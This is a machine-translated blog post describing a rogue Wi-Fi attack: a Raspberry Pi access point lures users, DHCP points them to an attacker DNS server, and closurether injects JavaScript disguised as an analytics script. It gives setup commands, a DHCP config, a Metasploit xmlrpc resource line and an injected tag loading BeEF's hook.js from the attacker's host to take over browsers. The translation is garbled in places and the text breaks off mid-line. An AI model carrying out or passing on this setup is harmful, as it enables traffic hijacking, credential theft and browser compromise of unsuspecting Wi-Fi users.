Another try of JS poisoning
I saw it half a month ago.EtherDream wrote the article about wifi traffic hijacking and JS poisoning, and it was a bit of fun in the company's laboratory. The first time I came into contact with this field, I felt quite fresh. Then I saw the sh4dow@lcx.cc wrote an article "intranet DNS poisoning technology hijacking session", I decided to share what I do.
0 × 01 attack ideas
1. Use Raspberry Pi to establish an AP and entice others to connect.
2. In Raspberry Pi, set the DNS to point to a proxy host (which is actually a man in the middle ).
3. Run closurether on the proxy host to perform JS poisoning.
4. There are many kinds of viruses. The original author of closurether designed a user name and password that can intercept the user's login, but the link has expired and won't write js itself, so we can use other methods. Here I chose the BeEF Framework for Cooperation and inserted hook. js in the traffic.
5. Since BeEF can be used with MSF to attack the browser, it is naturally necessary for MSF.
0 × 02 tool preparation
EDUP mini USB wireless NIC Driver-free (RTL8188CUS)
Raspberry Pi. The system image is Raspbian.
The team's Summer suggested that I use the TP-Link TL-WR703N to fl an openWRT, Which is portable and can implement many other features.
This idea has not been tried yet. After openWRT is flushed into the route, there is no space for the route to install other things.
0 × 03 modify Raspberry Pi
First, let Raspberry Pi run. People who have played it all know how to get it, download the image, write it into the image, and do not repeat it.
Second, let Raspberry Pi run as a router
Detailed can see here: http://www.daveconroy.com/using-your-raspberry-pi-as-a-wireless-router-and-web-server/
This is the first article to use Raspberry Pi to build a Wireless AP. The details here are detailed, including the principles and specific configurations. It is not surprising to sit down step by step.
The forged wifi here is used by the bar I used to learn how to adjust the wine. My master is Lavazza's top barista. But that bar is closed ...... If you are interested in children's shoes in Nanjing, you can have a place for me to adjust my liquor.
0 × 04 create intermediary
In the JS Cache Poisoning article, the author gives a very detailed explanation of the principle and provides the implementation code.
The platform I tested was Mac OS X 10.0 (black apple), which was easy to install and did not happen.
First, install node. js
Then install closurether
Npm install-g closurether
Run closurether
Closurether
If closurether runs successfully, the following information will be displayed (the permission required to run closurether in linux is relatively high, and other services that occupy ports 80 and 443 cannot be enabled in windows)
Sudo closurether
Password:
[SYS] local ip: 172.16.6.37
[DNS] running 0.0.0.0: 53
[WEB] listening 0.0.0.0: 80
[WEB] listening 0.0.0.0: 443
At this time, if you set the browser proxy to point to 127.0.0.1: 80, you can see all the traffic hijacked by closurether, including DNS resolution and http requests.
If you do this, check the source code in the browser. You will see that a script tag has been embedded in the source code, which is the attack code implanted by closurether.
To disguise, the address is written as a http://10086.cn/js10086/201306301200.js
But in fact, 10086.cn may not have such a file .... I am disguised as a google-analytis website analysis script.
You can modify the Attack Script and disguise in the config. json file.
0 × 05 modify DNS
The proxy (man-in-the-middle) has been prepared, so we need to direct the traffic to the proxy. As mentioned above, setting the browser proxy can be achieved, but the most ideal is the modification of DNS provided by the author.
Modify the DNS and direct it to the proxy server. Then, all the people who use this Wi-Fi network will resolve the domain name to the proxy server. After DNS resolution, the http traffic will also be directed to the proxy server, it makes closurether a man-in-the-middle.
In Raspberry Pi's DHCP settings:
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.1 192.168.1.254;
option routers 192.168.1.1;
option domain-name-servers 172.16.6.37;
interface wlan0;
}
172.16.6.37 is my Local Machine
At this time, when the device connected to the Wi-Fi device performs DNS resolution, the result is 172.16.6.37.
Then, all other requests point to the proxy.
PS: the author of closurether thinks very well. js poisoning can only be targeted at http or https. If it is another protocol, in the second request, the real DNS request results will be fed back to the client, which will not be easily discovered.
0X06 BeEF and MSF
Other people's articles are clearer than I have written.
However, there are still few articles on BeEF, and functions are being explored in succession.
Collaboration between BeEF and MSF is required.
Use
msfconsole -r beef.rc
To create an XMLRPC service for MSF. After BeEF is started, it will automatically call
Beef. rc has the following content:
Load xmlrpc ServerHost = <Server IP> Pass = <password> ServerType = Web
0 × 07 scatter the poison to the sky and let it fly with the wind (here there should be music from the villain)
Make the following changes in closurether:
Modify asset/inject/extern. js and add:
- var commandModuleStr = '<script src="http://172.16.6.37:3000/hook.js" type="text/javascript">// <
